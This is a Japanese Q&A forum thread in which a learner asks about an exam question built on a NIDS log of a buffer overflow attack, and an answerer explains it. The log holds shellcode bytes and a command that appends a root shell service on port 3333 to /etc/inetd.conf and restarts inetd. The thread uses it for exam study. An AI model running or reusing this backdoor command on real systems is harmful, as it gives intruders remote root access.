あるセキュリティの問題で全くログの読み方がわからないので、
わかる人がいたら教えて下さい。
・NIDSにおいて、バッファオーバーフロー攻撃の検知により生成されたログがある。
この攻撃は何か?
ここからログの内容
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
000bffff7040000000000000000000000000000000000000000000000bffff7050000bffff70
6000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000bffff707<90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
k^<89>v<83><8D>^(<83><89>^<83><8D>^.<83><83><83>#<89>^1<83><88>F'<88>F*<83>
<88>F<89>F+,<89><8D>N<8D>V<80>1<89>@<80> /bin/sh.-c echo 3333 stream tcp nowait
root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
1.バックドア用ポートの追加
2.バックドア用ユーザアカウントの追加
3.OS上のrootパスワードの変更
4.既存サービスのポート番号の変更
5.root権限でのリモートアクセス
答えは1番と5番ですが、その理由が全くわかりません。
よろしくお願いします。
No.1ベストアンサー
- 回答日時:
ログ中に、UNIX系OSで実行可能なコマンド文(下記参照)が含まれています。
/bin/sh.-c echo 3333 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
このコマンド文が攻撃対象のOSでどのような効果を持つのか考えれば、
答え(1番と5番)にたどり着きます。
もし、攻撃対象のOS指定が問題文になければ、問題の前提条件として、
広範囲なUNIX系OS(Solaris、HP-UX、AIX、NetBSDなど)の知識を保持している
ことが求められていますね。
簡単に解説すると、コマンド文は
1.inetdの設定ファイルへ1行追記
2.inetdに設定変更を反映
しているだけです。
「1.inetdの設定ファイルへ1行追記」している1行の内容を理解できれば、
答え(1番と5番)にたどり着きます。
状況が見えないのでアレですが、
もし、「試験対策問題」かつ「wakko777さんがUNIX系OSの知識を持っていない」場合、
試験対策としては、「この手の問題が出たらあきらめる(他の問題対策に時間をかける)」
のも一つの手かと思います。
その理由は、基礎知識として各種OSに精通していないと、
ほんの少し問題の内容が変わるだけで、回答不可能となるため。
(100%同じ内容の問題がでないと回答不可能)
onosuke様
回答ありがとうございました。
返事が遅くなってしまい申し訳ありません。
これは、ネットワークの試験問題です。
UNIX系OSですか~。
まったく知識がないので、あきらめるのもありですね。
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- 事件・犯罪 サイバー犯罪に巻き込まれたらしい 1 2022/08/12 00:31
- ハッキング・フィッシング詐欺 Facebookが乗っ取られました。メアド、電話番号も。 1 2022/08/11 21:58
- UNIX・Linux Linuxのシェル関数を作成して要件を満たす方法 1 2022/11/19 20:33
- その他(セキュリティ) Facebookが乗っ取られました。二つのメアド、電話番号も。 1 2022/08/11 19:01
- UNIX・Linux Linuxのメッセージを出力して処理を終了する方法 1 2022/11/19 20:31
- UNIX・Linux 実行の仕方及び実行結果が分かりません。 2 2022/11/17 19:31
- その他(プログラミング・Web制作) zshの例外処理 1 2022/06/02 16:36
- その他(セキュリティ) 私の携帯の電話番号とメールアドレス(どこで流出したのかはわからないですが)適当なアカウントを作成され 1 2022/12/06 17:50
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
<自分が所有者のファイルの所...
-
root権限でも『Permission deni...
-
chownで所有権の変更ってrootし...
-
hwclockについて
-
一般ユーザーでログインできな...
-
別ユーザでのコマンド実行(root...
-
Linuxでユーザ権限の確認コマンド
-
vi使用後、「vimiinfoが保存...
-
[CentOS7] ユーザー(root,管理...
-
scpコマンドの-pオプションにつ...
-
.bash_historyについて
-
Linuxメールサーバのメールアド...
-
ユーザをwheelグループに追加す...
-
ubuntu9.0.4でユーザーにsudo権...
-
ubuntuのchmodでルートディレク...
-
仮想コンソールでscriptコマン...
-
sudo: npm: コマンドが見つかり...
-
CUIでの、$(ドルマーク)の使...
-
linux(redhat9)の文字化けを直...
-
Linuxを勉強している超初心者で...
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
scpコマンドの-pオプションにつ...
-
<自分が所有者のファイルの所...
-
TeraTermで操作する際の設定に...
-
vi使用後、「vimiinfoが保存...
-
Linuxでユーザ権限の確認コマンド
-
リモートで使うとuseraddが使え...
-
chownで所有権の変更ってrootし...
-
[CentOS7] ユーザー(root,管理...
-
sudo: npm: コマンドが見つかり...
-
ユーザをwheelグループに追加す...
-
CUIでの、$(ドルマーク)の使...
-
Linuxメールサーバのメールアド...
-
ubuntuのchmodでルートディレク...
-
smbpasswd 一括登録
-
Linuxでsudo su - って何のコマ...
-
root権限でも『Permission deni...
-
Ubuntuで、suとsudoの違いが分...
-
一般ユーザーでログインできな...
-
別ユーザでのコマンド実行(root...
-
linux(redhat9)の文字化けを直...
おすすめ情報